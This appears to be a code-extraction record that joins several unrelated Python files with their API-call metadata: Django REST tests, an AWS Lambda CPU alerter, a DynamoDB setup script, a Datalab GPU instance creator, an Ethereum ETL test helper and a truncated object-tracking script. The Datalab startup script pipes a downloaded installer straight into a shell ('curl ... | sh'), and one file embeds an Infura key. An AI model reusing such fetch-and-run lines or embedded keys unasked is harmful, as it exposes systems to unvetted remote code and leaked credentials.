[((142, 174), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (158, 174), False, 'from django.db import models\n')]
|
import unittest
import datetime
from rest_framework import status, test
from rest_framework.reverse import reverse
from waldur_core.core.utils import datetime_to_timestamp
from waldur_core.structure.tests.factories import TestNewInstanceFactory, TestServiceProjectLinkFactory, UserFactory
from ..models import ResourceSla, ResourceItem, ResourceSlaStateTransition
from ..utils import format_period
class BaseMonitoringTest(test.APITransactionTestCase):
def setUp(self):
self.link = TestServiceProjectLinkFactory()
self.vm1 = TestNewInstanceFactory(service_project_link=self.link)
self.vm2 = TestNewInstanceFactory(service_project_link=self.link)
self.vm3 = TestNewInstanceFactory(service_project_link=self.link)
self.client.force_authenticate(UserFactory(is_staff=True))
@unittest.skip('Monitoring is not supported by structure yet.')
class SlaTest(BaseMonitoringTest):
def setUp(self):
super(SlaTest, self).setUp()
today = datetime.date.today()
period = format_period(today)
invalid_date = today + datetime.timedelta(days=100)
invalid_period = format_period(invalid_date)
ResourceSla.objects.create(scope=self.vm1, period=period, value=90)
ResourceSla.objects.create(scope=self.vm1, period=invalid_period, value=70)
ResourceSla.objects.create(scope=self.vm2, period=period, value=80)
def test_sorting(self):
response = self.client.get(TestNewInstanceFactory.get_list_url(), data={'o': 'actual_sla'})
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(2, len(response.data))
self.assertEqual([80, 90], [item['sla']['value'] for item in response.data])
def test_filtering(self):
response = self.client.get(TestNewInstanceFactory.get_list_url(), data={'actual_sla': 80})
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(1, len(response.data))
def test_actual_sla_serializer(self):
response = self.client.get(TestNewInstanceFactory.get_url(self.vm1))
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(90, response.data['sla']['value'])
@unittest.skip('Monitoring is not supported by structure yet.')
class EventsTest(BaseMonitoringTest):
def setUp(self):
super(EventsTest, self).setUp()
today = datetime.date.today()
timestamp = datetime_to_timestamp(today)
period = format_period(today)
ResourceSlaStateTransition.objects.create(scope=self.vm1, period=period, timestamp=timestamp, state=True)
ResourceSlaStateTransition.objects.create(scope=self.vm2, period=period, timestamp=timestamp, state=False)
self.url = reverse('resource-sla-state-transition-list')
def test_scope_filter(self):
vm1_url = TestNewInstanceFactory.get_url(self.vm1)
response = self.client.get(self.url, data={'scope': vm1_url})
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual('U', response.data[0]['state'])
vm2_url = TestNewInstanceFactory.get_url(self.vm2)
response = self.client.get(self.url, data={'scope': vm2_url})
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual('D', response.data[0]['state'])
def test_period_filter(self):
url = reverse('resource-sla-state-transition-list')
today = datetime.date.today()
invalid_date = today + datetime.timedelta(days=100)
invalid_period = format_period(invalid_date)
response = self.client.get(url, data={'period': invalid_period})
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(0, len(response.data))
@unittest.skip('Monitoring is not supported by structure yet.')
class ItemTest(BaseMonitoringTest):
def setUp(self):
super(ItemTest, self).setUp()
ResourceItem.objects.create(scope=self.vm1, name='application_status', value=1)
ResourceItem.objects.create(scope=self.vm2, name='application_status', value=0)
ResourceItem.objects.create(scope=self.vm1, name='ram_usage', value=10)
ResourceItem.objects.create(scope=self.vm2, name='ram_usage', value=20)
def test_serializer(self):
response = self.client.get(TestNewInstanceFactory.get_url(self.vm1))
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual({'application_status': 1, 'ram_usage': 10},
response.data['monitoring_items'])
def test_filter(self):
response = self.client.get(TestNewInstanceFactory.get_list_url(),
data={'monitoring__application_status': 1})
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(1, len(response.data))
def test_sorter(self):
response = self.client.get(TestNewInstanceFactory.get_list_url(),
data={'o': 'monitoring__application_status'})
self.assertEqual(response.status_code, status.HTTP_200_OK)
values = []
for item in response.data:
if not item['monitoring_items']:
values.append(None)
else:
values.append(item['monitoring_items']['application_status'])
self.assertEqual([0, 1], values)
|
[
"waldur_core.structure.tests.factories.TestNewInstanceFactory",
"waldur_core.core.utils.datetime_to_timestamp",
"waldur_core.structure.tests.factories.UserFactory",
"datetime.date.today",
"rest_framework.reverse.reverse",
"unittest.skip",
"datetime.timedelta",
"waldur_core.structure.tests.factories.TestNewInstanceFactory.get_list_url",
"waldur_core.structure.tests.factories.TestServiceProjectLinkFactory",
"waldur_core.structure.tests.factories.TestNewInstanceFactory.get_url"
] |
[((823, 885), 'unittest.skip', 'unittest.skip', (['"""Monitoring is not supported by structure yet."""'], {}), "('Monitoring is not supported by structure yet.')\n", (836, 885), False, 'import unittest\n'), ((2231, 2293), 'unittest.skip', 'unittest.skip', (['"""Monitoring is not supported by structure yet."""'], {}), "('Monitoring is not supported by structure yet.')\n", (2244, 2293), False, 'import unittest\n'), ((3795, 3857), 'unittest.skip', 'unittest.skip', (['"""Monitoring is not supported by structure yet."""'], {}), "('Monitoring is not supported by structure yet.')\n", (3808, 3857), False, 'import unittest\n'), ((499, 530), 'waldur_core.structure.tests.factories.TestServiceProjectLinkFactory', 'TestServiceProjectLinkFactory', ([], {}), '()\n', (528, 530), False, 'from waldur_core.structure.tests.factories import TestNewInstanceFactory, TestServiceProjectLinkFactory, UserFactory\n'), ((550, 604), 'waldur_core.structure.tests.factories.TestNewInstanceFactory', 'TestNewInstanceFactory', ([], {'service_project_link': 'self.link'}), '(service_project_link=self.link)\n', (572, 604), False, 'from waldur_core.structure.tests.factories import TestNewInstanceFactory, TestServiceProjectLinkFactory, UserFactory\n'), ((624, 678), 'waldur_core.structure.tests.factories.TestNewInstanceFactory', 'TestNewInstanceFactory', ([], {'service_project_link': 'self.link'}), '(service_project_link=self.link)\n', (646, 678), False, 'from waldur_core.structure.tests.factories import TestNewInstanceFactory, TestServiceProjectLinkFactory, UserFactory\n'), ((698, 752), 'waldur_core.structure.tests.factories.TestNewInstanceFactory', 'TestNewInstanceFactory', ([], {'service_project_link': 'self.link'}), '(service_project_link=self.link)\n', (720, 752), False, 'from waldur_core.structure.tests.factories import TestNewInstanceFactory, TestServiceProjectLinkFactory, UserFactory\n'), ((996, 1017), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (1015, 1017), False, 'import datetime\n'), ((2410, 2431), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (2429, 2431), False, 'import datetime\n'), ((2452, 2480), 'waldur_core.core.utils.datetime_to_timestamp', 'datetime_to_timestamp', (['today'], {}), '(today)\n', (2473, 2480), False, 'from waldur_core.core.utils import datetime_to_timestamp\n'), ((2769, 2814), 'rest_framework.reverse.reverse', 'reverse', (['"""resource-sla-state-transition-list"""'], {}), "('resource-sla-state-transition-list')\n", (2776, 2814), False, 'from rest_framework.reverse import reverse\n'), ((2867, 2907), 'waldur_core.structure.tests.factories.TestNewInstanceFactory.get_url', 'TestNewInstanceFactory.get_url', (['self.vm1'], {}), '(self.vm1)\n', (2897, 2907), False, 'from waldur_core.structure.tests.factories import TestNewInstanceFactory, TestServiceProjectLinkFactory, UserFactory\n'), ((3121, 3161), 'waldur_core.structure.tests.factories.TestNewInstanceFactory.get_url', 'TestNewInstanceFactory.get_url', (['self.vm2'], {}), '(self.vm2)\n', (3151, 3161), False, 'from waldur_core.structure.tests.factories import TestNewInstanceFactory, TestServiceProjectLinkFactory, UserFactory\n'), ((3405, 3450), 'rest_framework.reverse.reverse', 'reverse', (['"""resource-sla-state-transition-list"""'], {}), "('resource-sla-state-transition-list')\n", (3412, 3450), False, 'from rest_framework.reverse import reverse\n'), ((3468, 3489), 'datetime.date.today', 'datetime.date.today', ([], {}), '()\n', (3487, 3489), False, 'import datetime\n'), ((792, 818), 'waldur_core.structure.tests.factories.UserFactory', 'UserFactory', ([], {'is_staff': '(True)'}), '(is_staff=True)\n', (803, 818), False, 'from waldur_core.structure.tests.factories import TestNewInstanceFactory, TestServiceProjectLinkFactory, UserFactory\n'), ((1088, 1116), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(100)'}), '(days=100)\n', (1106, 1116), False, 'import datetime\n'), ((1471, 1508), 'waldur_core.structure.tests.factories.TestNewInstanceFactory.get_list_url', 'TestNewInstanceFactory.get_list_url', ([], {}), '()\n', (1506, 1508), False, 'from waldur_core.structure.tests.factories import TestNewInstanceFactory, TestServiceProjectLinkFactory, UserFactory\n'), ((1802, 1839), 'waldur_core.structure.tests.factories.TestNewInstanceFactory.get_list_url', 'TestNewInstanceFactory.get_list_url', ([], {}), '()\n', (1837, 1839), False, 'from waldur_core.structure.tests.factories import TestNewInstanceFactory, TestServiceProjectLinkFactory, UserFactory\n'), ((2059, 2099), 'waldur_core.structure.tests.factories.TestNewInstanceFactory.get_url', 'TestNewInstanceFactory.get_url', (['self.vm1'], {}), '(self.vm1)\n', (2089, 2099), False, 'from waldur_core.structure.tests.factories import TestNewInstanceFactory, TestServiceProjectLinkFactory, UserFactory\n'), ((3521, 3549), 'datetime.timedelta', 'datetime.timedelta', ([], {'days': '(100)'}), '(days=100)\n', (3539, 3549), False, 'import datetime\n'), ((4358, 4398), 'waldur_core.structure.tests.factories.TestNewInstanceFactory.get_url', 'TestNewInstanceFactory.get_url', (['self.vm1'], {}), '(self.vm1)\n', (4388, 4398), False, 'from waldur_core.structure.tests.factories import TestNewInstanceFactory, TestServiceProjectLinkFactory, UserFactory\n'), ((4659, 4696), 'waldur_core.structure.tests.factories.TestNewInstanceFactory.get_list_url', 'TestNewInstanceFactory.get_list_url', ([], {}), '()\n', (4694, 4696), False, 'from waldur_core.structure.tests.factories import TestNewInstanceFactory, TestServiceProjectLinkFactory, UserFactory\n'), ((4955, 4992), 'waldur_core.structure.tests.factories.TestNewInstanceFactory.get_list_url', 'TestNewInstanceFactory.get_list_url', ([], {}), '()\n', (4990, 4992), False, 'from waldur_core.structure.tests.factories import TestNewInstanceFactory, TestServiceProjectLinkFactory, UserFactory\n')]
|
import json
import boto3
# configuration
alerts_queue_name = "alerts-queue"
# AWS SDK clients
s3 = boto3.client("s3")
sqs = boto3.client("sqs")
# =============
# HELPER METHOD
# =============
def read_s3_object(bucket, key) -> str:
data = s3.get_object(Bucket=bucket, Key=key)
return data["Body"].read().decode("utf-8")
def read_changed_object(event) -> str:
s3_event = event["Records"][0]["s3"]
bucket = s3_event["bucket"]["name"]
key = s3_event["object"]["key"]
return read_s3_object(bucket, key)
# ==============
# Lambda handler
# ==============
def handler(event, context):
print("invoking function")
if "Records" not in event:
print("invocation not triggered by an event")
return
# resolve the queue to publish alerts to
alerts_queue_url = sqs.get_queue_url(QueueName=alerts_queue_name)['QueueUrl']
log_content = read_changed_object(event)
print("log content")
print(log_content)
# parse structured log records
records = [json.loads(line) for line in log_content.split("\n") if line.strip()]
alerts = []
print("HELLO FRB!")
for record in records:
# filter log records to create alerts
try:
alert = None
# TODO: adjust the here thresholds here
if record['cpu'] >= 90:
alert = {"timestamp": record['timestamp'], "level": "CRITICAL", "message": "Critical CPU utilization"}
elif record['cpu'] >= 60:
alert = {"timestamp": record['timestamp'], "level": "WARNING", "message": "High CPU utilization"}
if alert:
print("alert", alert)
alerts.append(alert)
sqs.send_message(MessageBody=json.dumps(alert), QueueUrl=alerts_queue_url)
except KeyError:
pass
|
[
"json.loads",
"boto3.client",
"json.dumps"
] |
[((102, 120), 'boto3.client', 'boto3.client', (['"""s3"""'], {}), "('s3')\n", (114, 120), False, 'import boto3\n'), ((127, 146), 'boto3.client', 'boto3.client', (['"""sqs"""'], {}), "('sqs')\n", (139, 146), False, 'import boto3\n'), ((1022, 1038), 'json.loads', 'json.loads', (['line'], {}), '(line)\n', (1032, 1038), False, 'import json\n'), ((1747, 1764), 'json.dumps', 'json.dumps', (['alert'], {}), '(alert)\n', (1757, 1764), False, 'import json\n')]
|
import boto3
def create_movie_table(dynamodb=None):
dynamodb = boto3.resource("dynamodb", endpoint_url="http://localhost:8000")
table = dynamodb.create_table(
TableName="Movies",
KeySchema=[
{"AttributeName": "year", "KeyType": "HASH"}, # Partition key
{"AttributeName": "title", "KeyType": "RANGE"}, # Sort key
],
AttributeDefinitions=[
{"AttributeName": "year", "AttributeType": "N"},
{"AttributeName": "title", "AttributeType": "S"},
],
ProvisionedThroughput={"ReadCapacityUnits": 10, "WriteCapacityUnits": 10},
)
return table
if __name__ == "__main__":
movie_table = create_movie_table()
|
[
"boto3.resource"
] |
[((69, 133), 'boto3.resource', 'boto3.resource', (['"""dynamodb"""'], {'endpoint_url': '"""http://localhost:8000"""'}), "('dynamodb', endpoint_url='http://localhost:8000')\n", (83, 133), False, 'import boto3\n')]
|
# Copyright 2016 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Methods for implementing the `datalab beta creategpu` command."""
import os
import tempfile
import create
import connect
import utils
description = ("""`{0} {1}` creates a new Datalab instance running in a Google
Compute Engine VM with a GPU.
This command also creates the 'datalab-network' network if necessary.
By default, the command creates a persistent connection to the newly
created instance. You can disable that behavior by passing in the
'--no-connect' flag.""")
_NVIDIA_PACKAGE = 'cuda-repo-ubuntu1604_8.0.61-1_amd64.deb'
_THIRD_PARTY_SOFTWARE_DIALOG = (
"""By accepting below, you will download and install the
following third-party software onto your managed GCE instances:
NVidia GPU CUDA Toolkit Drivers: """ + _NVIDIA_PACKAGE)
_DATALAB_STARTUP_SCRIPT = create._DATALAB_BASE_STARTUP_SCRIPT + """
install_cuda() {{
# Check for CUDA and try to install.
if ! dpkg-query -W cuda; then
curl -O http://developer.download.nvidia.com/\
compute/cuda/repos/ubuntu1604/x86_64/{6}
dpkg -i ./{6}
apt-get update -y
apt-get install cuda -y
fi
}}
install_nvidia_docker() {{
# Install normal docker then install nvidia-docker
if ! dpkg-query -W docker; then
curl -sSL https://get.docker.com/ | sh
curl -L -O https://github.com/NVIDIA/nvidia-docker/releases/\
download/v1.0.1/nvidia-docker_1.0.1-1_amd64.deb
dpkg -i ./nvidia-docker_1.0.1-1_amd64.deb
apt-get update -y
apt-get install nvidia-docker -y
fi
}}
cleanup_packages() {{
apt-get update -y
apt-get remove -y dnsmasq-base || true
}}
pull_datalab_image() {{
if [[ "$(docker images -q {0})" == "" ]]; then
gcloud docker -- pull {0} ;
fi
}}
start_datalab_docker() {{
nvidia-docker run --restart always -p '127.0.0.1:8080:8080' \
-e DATALAB_ENV='GCE' -e DATALAB_DEBUG='true' \
-e DATALAB_SETTINGS_OVERRIDES=\
'{{"enableAutoGCSBackups": {3}, "consoleLogLevel": "{4}" }}' \
-e DATALAB_GIT_AUTHOR='{5}' \
-v "${{MOUNT_DIR}}/content:/content" \
-v "${{MOUNT_DIR}}/tmp:/tmp" \
{0} -c /datalab/run.sh
}}
start_fluentd_docker() {{
docker run --restart always \
-e FLUENTD_ARGS='-q' \
-v /var/log:/var/log \
-v /var/lib/docker/containers:/var/lib/docker/containers:ro \
gcr.io/google_containers/fluentd-gcp:1.18
}}
cleanup_packages
install_cuda
install_nvidia_docker
cleanup_packages
pull_datalab_image
mount_and_prepare_disk
configure_swap
cleanup_tmp
start_datalab_docker
start_fluentd_docker
journalctl -u google-startup-scripts --no-pager > /var/log/startupscript.log
"""
def flags(parser):
"""Add command line flags for the `create` subcommand.
Args:
parser: The argparse parser to which to add the flags.
"""
create.flags(parser)
parser.set_defaults(image_name='gcr.io/cloud-datalab/datalab-gpu:latest')
parser.add_argument(
'--accelerator-type',
dest='accelerator_type',
default='nvidia-tesla-k80',
help=(
'the accelerator type of the instance.'
'\n\n'
'Datalab currently only supports nvidia-tesla-k80.'
'\n\n'
'If not specified, the default type is none.'))
parser.add_argument(
'--accelerator-count',
dest='accelerator_count',
type=int,
default=1,
help=(
'the accelerator count of the instance, used if '
'accelerator-type is specified.'
'\n\n'
'If not specified, the default type is 1.'))
return
def run(args, gcloud_beta_compute, gcloud_repos,
email='', in_cloud_shell=False, gcloud_zone=None, **kwargs):
"""Implementation of the `datalab create` subcommand.
Args:
args: The Namespace instance returned by argparse
gcloud_beta_compute: Function that can be used to invoke `gcloud compute`
gcloud_repos: Function that can be used to invoke
`gcloud source repos`
email: The user's email address
in_cloud_shell: Whether or not the command is being run in the
Google Cloud Shell
gcloud_zone: The zone that gcloud is configured to use
Raises:
subprocess.CalledProcessError: If a nested `gcloud` calls fails
"""
if not utils.prompt_for_confirmation(
args=args,
message=_THIRD_PARTY_SOFTWARE_DIALOG,
question='Do you accept',
accept_by_default=False):
print('Installation not accepted; Exiting.')
return
if (not args.zone) and (not args.disk_name):
args.zone = gcloud_zone
if (not args.zone) and (not args.quiet):
args.zone = utils.prompt_for_zone(args, gcloud_beta_compute)
disk_cfg = create.prepare(args, gcloud_beta_compute, gcloud_repos)
print('Creating the instance {0}'.format(args.instance))
print('\n\nDue to GPU Driver installation, please note that '
'Datalab GPU instances take significantly longer to '
'startup compared to non-GPU instances.')
cmd = ['instances', 'create']
if args.zone:
cmd.extend(['--zone', args.zone])
enable_swap = "false" if args.no_swap else "true"
enable_backups = "false" if args.no_backups else "true"
console_log_level = args.log_level or "warn"
user_email = args.for_user or email
service_account = args.service_account or "default"
# We have to escape the user's email before using it in the YAML template.
escaped_email = user_email.replace("'", "''")
with tempfile.NamedTemporaryFile(delete=False) as startup_script_file, \
tempfile.NamedTemporaryFile(delete=False) as for_user_file:
try:
startup_script_file.write(_DATALAB_STARTUP_SCRIPT.format(
args.image_name, create._DATALAB_NOTEBOOKS_REPOSITORY,
enable_swap, enable_backups, console_log_level,
escaped_email, _NVIDIA_PACKAGE))
startup_script_file.close()
for_user_file.write(user_email)
for_user_file.close()
metadata_template = (
'startup-script={0},' +
'for-user={1}')
metadata_from_file = (
metadata_template.format(
startup_script_file.name,
for_user_file.name))
cmd.extend([
'--format=none',
'--boot-disk-size=20GB',
'--network', args.network_name,
'--image-family', 'ubuntu-1604-lts',
'--image-project', 'ubuntu-os-cloud',
'--machine-type', args.machine_type,
'--accelerator',
'type=' + args.accelerator_type + ',count='
+ str(args.accelerator_count),
'--maintenance-policy', 'TERMINATE', '--restart-on-failure',
'--metadata-from-file', metadata_from_file,
'--tags', 'datalab',
'--disk', disk_cfg,
'--service-account', service_account,
'--scopes', 'cloud-platform',
args.instance])
gcloud_beta_compute(args, cmd)
finally:
os.remove(startup_script_file.name)
os.remove(for_user_file.name)
if (not args.no_connect) and (not args.for_user):
connect.connect(args, gcloud_beta_compute, email, in_cloud_shell)
return
|
[
"tempfile.NamedTemporaryFile",
"os.remove",
"utils.prompt_for_confirmation",
"create.flags",
"utils.prompt_for_zone",
"connect.connect",
"create.prepare"
] |
[((3306, 3326), 'create.flags', 'create.flags', (['parser'], {}), '(parser)\n', (3318, 3326), False, 'import create\n'), ((5262, 5317), 'create.prepare', 'create.prepare', (['args', 'gcloud_beta_compute', 'gcloud_repos'], {}), '(args, gcloud_beta_compute, gcloud_repos)\n', (5276, 5317), False, 'import create\n'), ((4803, 4941), 'utils.prompt_for_confirmation', 'utils.prompt_for_confirmation', ([], {'args': 'args', 'message': '_THIRD_PARTY_SOFTWARE_DIALOG', 'question': '"""Do you accept"""', 'accept_by_default': '(False)'}), "(args=args, message=\n _THIRD_PARTY_SOFTWARE_DIALOG, question='Do you accept',\n accept_by_default=False)\n", (4832, 4941), False, 'import utils\n'), ((5198, 5246), 'utils.prompt_for_zone', 'utils.prompt_for_zone', (['args', 'gcloud_beta_compute'], {}), '(args, gcloud_beta_compute)\n', (5219, 5246), False, 'import utils\n'), ((6052, 6093), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {'delete': '(False)'}), '(delete=False)\n', (6079, 6093), False, 'import tempfile\n'), ((6132, 6173), 'tempfile.NamedTemporaryFile', 'tempfile.NamedTemporaryFile', ([], {'delete': '(False)'}), '(delete=False)\n', (6159, 6173), False, 'import tempfile\n'), ((7849, 7914), 'connect.connect', 'connect.connect', (['args', 'gcloud_beta_compute', 'email', 'in_cloud_shell'], {}), '(args, gcloud_beta_compute, email, in_cloud_shell)\n', (7864, 7914), False, 'import connect\n'), ((7708, 7743), 'os.remove', 'os.remove', (['startup_script_file.name'], {}), '(startup_script_file.name)\n', (7717, 7743), False, 'import os\n'), ((7756, 7785), 'os.remove', 'os.remove', (['for_user_file.name'], {}), '(for_user_file.name)\n', (7765, 7785), False, 'import os\n')]
|
import os
from web3 import HTTPProvider
from ethereumetl.providers.rpc import BatchHTTPProvider
from tests.ethereumetl.job.mock_batch_web3_provider import MockBatchWeb3Provider
from tests.ethereumetl.job.mock_web3_provider import MockWeb3Provider
def get_web3_provider(provider_type, read_resource_lambda=None, batch=False):
if provider_type == 'mock':
if read_resource_lambda is None:
raise ValueError('read_resource_lambda must not be None for provider type mock'.format(provider_type))
if batch:
provider = MockBatchWeb3Provider(read_resource_lambda)
else:
provider = MockWeb3Provider(read_resource_lambda)
elif provider_type == 'infura':
provider_url = os.environ.get('PROVIDER_URL', 'https://mainnet.infura.io/v3/7aef3f0cd1f64408b163814b22cc643c')
if batch:
provider = BatchHTTPProvider(provider_url)
else:
provider = HTTPProvider(provider_url)
else:
raise ValueError('Provider type {} is unexpected'.format(provider_type))
return provider
|
[
"tests.ethereumetl.job.mock_web3_provider.MockWeb3Provider",
"tests.ethereumetl.job.mock_batch_web3_provider.MockBatchWeb3Provider",
"os.environ.get",
"web3.HTTPProvider",
"ethereumetl.providers.rpc.BatchHTTPProvider"
] |
[((558, 601), 'tests.ethereumetl.job.mock_batch_web3_provider.MockBatchWeb3Provider', 'MockBatchWeb3Provider', (['read_resource_lambda'], {}), '(read_resource_lambda)\n', (579, 601), False, 'from tests.ethereumetl.job.mock_batch_web3_provider import MockBatchWeb3Provider\n'), ((639, 677), 'tests.ethereumetl.job.mock_web3_provider.MockWeb3Provider', 'MockWeb3Provider', (['read_resource_lambda'], {}), '(read_resource_lambda)\n', (655, 677), False, 'from tests.ethereumetl.job.mock_web3_provider import MockWeb3Provider\n'), ((737, 836), 'os.environ.get', 'os.environ.get', (['"""PROVIDER_URL"""', '"""https://mainnet.infura.io/v3/7aef3f0cd1f64408b163814b22cc643c"""'], {}), "('PROVIDER_URL',\n 'https://mainnet.infura.io/v3/7aef3f0cd1f64408b163814b22cc643c')\n", (751, 836), False, 'import os\n'), ((874, 905), 'ethereumetl.providers.rpc.BatchHTTPProvider', 'BatchHTTPProvider', (['provider_url'], {}), '(provider_url)\n', (891, 905), False, 'from ethereumetl.providers.rpc import BatchHTTPProvider\n'), ((943, 969), 'web3.HTTPProvider', 'HTTPProvider', (['provider_url'], {}), '(provider_url)\n', (955, 969), False, 'from web3 import HTTPProvider\n')]
|
# ------------------------------------------------------------------------
# Copyright (c) 2021 4669 (for eccv submission only). All Rights Reserved.
# ------------------------------------------------------------------------
# Modified from Deformable DETR (https://github.com/fundamentalvision/Deformable-DETR)
# Copyright (c) 2020 SenseTime. All Rights Reserved.
# ------------------------------------------------------------------------
# Modified from DETR (https://github.com/facebookresearch/detr)
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
# ------------------------------------------------------------------------
"""
SORT: A Simple, Online and Realtime Tracker
Copyright (C) 2016-2020 <NAME> <EMAIL>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from __future__ import print_function
import os
import numpy as np
import random
import argparse
import torchvision.transforms.functional as F
import torch
import cv2
from tqdm import tqdm
from pathlib import Path
from PIL import Image, ImageDraw
from models import build_model
from util.tool import load_model
from main import get_args_parser
from torch.nn.functional import interpolate
from typing import List
from util.evaluation import Evaluator
import motmetrics as mm
import shutil
from models.structures import Instances
from torch.utils.data import Dataset, DataLoader
np.random.seed(2020)
COLORS_10 = [(144, 238, 144), (178, 34, 34), (221, 160, 221), (0, 255, 0), (0, 128, 0), (210, 105, 30), (220, 20, 60),
(192, 192, 192), (255, 228, 196), (50, 205, 50), (139, 0, 139), (100, 149, 237), (138, 43, 226),
(238, 130, 238),
(255, 0, 255), (0, 100, 0), (127, 255, 0), (255, 0, 255), (0, 0, 205), (255, 140, 0), (255, 239, 213),
(199, 21, 133), (124, 252, 0), (147, 112, 219), (106, 90, 205), (176, 196, 222), (65, 105, 225),
(173, 255, 47),
(255, 20, 147), (219, 112, 147), (186, 85, 211), (199, 21, 133), (148, 0, 211), (255, 99, 71),
(144, 238, 144),
(255, 255, 0), (230, 230, 250), (0, 0, 255), (128, 128, 0), (189, 183, 107), (255, 255, 224),
(128, 128, 128),
(105, 105, 105), (64, 224, 208), (205, 133, 63), (0, 128, 128), (72, 209, 204), (139, 69, 19),
(255, 245, 238),
(250, 240, 230), (152, 251, 152), (0, 255, 255), (135, 206, 235), (0, 191, 255), (176, 224, 230),
(0, 250, 154),
(245, 255, 250), (240, 230, 140), (245, 222, 179), (0, 139, 139), (143, 188, 143), (255, 0, 0),
(240, 128, 128),
(102, 205, 170), (60, 179, 113), (46, 139, 87), (165, 42, 42), (178, 34, 34), (175, 238, 238),
(255, 248, 220),
(218, 165, 32), (255, 250, 240), (253, 245, 230), (244, 164, 96), (210, 105, 30)]
def plot_one_box(x, img, color=None, label=None, score=None, line_thickness=None):
# Plots one bounding box on image img
# tl = line_thickness or round(
# 0.002 * max(img.shape[0:2])) + 1 # line thickness
tl = 2
color = color or [random.randint(0, 255) for _ in range(3)]
c1, c2 = (int(x[0]), int(x[1])), (int(x[2]), int(x[3]))
cv2.rectangle(img, c1, c2, color, thickness=tl)
if label:
tf = max(tl - 1, 1) # font thickness
t_size = cv2.getTextSize(label, 0, fontScale=tl / 3, thickness=tf)[0]
c2 = c1[0] + t_size[0], c1[1] - t_size[1] - 3
cv2.rectangle(img, c1, c2, color, -1) # filled
cv2.putText(img,
label, (c1[0], c1[1] - 2),
0,
tl / 3, [225, 255, 255],
thickness=tf,
lineType=cv2.LINE_AA)
if score is not None:
cv2.putText(img, score, (c1[0], c1[1] + 30), 0, tl / 3, [225, 255, 255], thickness=tf, lineType=cv2.LINE_AA)
return img
'''
deep sort 中的画图方法,在原图上进行作画
'''
def draw_bboxes(ori_img, bbox, identities=None, offset=(0, 0), cvt_color=False):
if cvt_color:
ori_img = cv2.cvtColor(np.asarray(ori_img), cv2.COLOR_RGB2BGR)
img = ori_img
for i, box in enumerate(bbox):
x1, y1, x2, y2 = [int(i) for i in box[:4]]
x1 += offset[0]
x2 += offset[0]
y1 += offset[1]
y2 += offset[1]
if len(box) > 4:
score = '{:.2f}'.format(box[4])
else:
score = None
# box text and bar
id = int(identities[i]) if identities is not None else 0
color = COLORS_10[id % len(COLORS_10)]
label = '{:d}'.format(id)
# t_size = cv2.getTextSize(label, cv2.FONT_HERSHEY_PLAIN, 2 , 2)[0]
img = plot_one_box([x1, y1, x2, y2], img, color, label, score=score)
return img
def draw_points(img: np.ndarray, points: np.ndarray, color=(255, 255, 255)) -> np.ndarray:
assert len(points.shape) == 2 and points.shape[1] == 2, 'invalid points shape: {}'.format(points.shape)
for i, (x, y) in enumerate(points):
if i >= 300:
color = (0, 255, 0)
cv2.circle(img, (int(x), int(y)), 2, color=color, thickness=2)
return img
def tensor_to_numpy(tensor: torch.Tensor) -> np.ndarray:
return tensor.detach().cpu().numpy()
class Track(object):
track_cnt = 0
def __init__(self, box):
self.box = box
self.time_since_update = 0
self.id = Track.track_cnt
Track.track_cnt += 1
self.miss = 0
def miss_one_frame(self):
self.miss += 1
def clear_miss(self):
self.miss = 0
def update(self, box):
self.box = box
self.clear_miss()
class MOTR(object):
def __init__(self, max_age=1, min_hits=3, iou_threshold=0.3):
"""
Sets key parameters for SORT
"""
self.max_age = max_age
self.min_hits = min_hits
self.iou_threshold = iou_threshold
self.trackers = []
self.frame_count = 0
self.active_trackers = {}
self.inactive_trackers = {}
self.disappeared_tracks = []
def _remove_track(self, slot_id):
self.inactive_trackers.pop(slot_id)
self.disappeared_tracks.append(slot_id)
def clear_disappeared_track(self):
self.disappeared_tracks = []
def update(self, dt_instances: Instances):
"""
Params:
dets - a numpy array of detections in the format [[x1,y1,x2,y2,score],[x1,y1,x2,y2,score],...]
Requires: this method must be called once for each frame even with empty detections (use np.empty((0, 5)) for frames without detections).
Returns the a similar array, where the last column is the object ID.
NOTE: The number of objects returned may differ from the number of detections provided.
"""
self.frame_count += 1
# get predicted locations from existing trackers.
dt_idxes = set(dt_instances.obj_idxes.tolist())
track_idxes = set(self.active_trackers.keys()).union(set(self.inactive_trackers.keys()))
matched_idxes = dt_idxes.intersection(track_idxes)
unmatched_tracker = track_idxes - matched_idxes
for track_id in unmatched_tracker:
# miss in this frame, move to inactive_trackers.
if track_id in self.active_trackers:
self.inactive_trackers[track_id] = self.active_trackers.pop(track_id)
self.inactive_trackers[track_id].miss_one_frame()
if self.inactive_trackers[track_id].miss > 10:
self._remove_track(track_id)
for i in range(len(dt_instances)):
idx = dt_instances.obj_idxes[i]
bbox = np.concatenate([dt_instances.boxes[i], dt_instances.scores[i:i+1]], axis=-1)
label = dt_instances.labels[i]
if label == 0:
# get a positive track.
if idx in self.inactive_trackers:
# set state of track active.
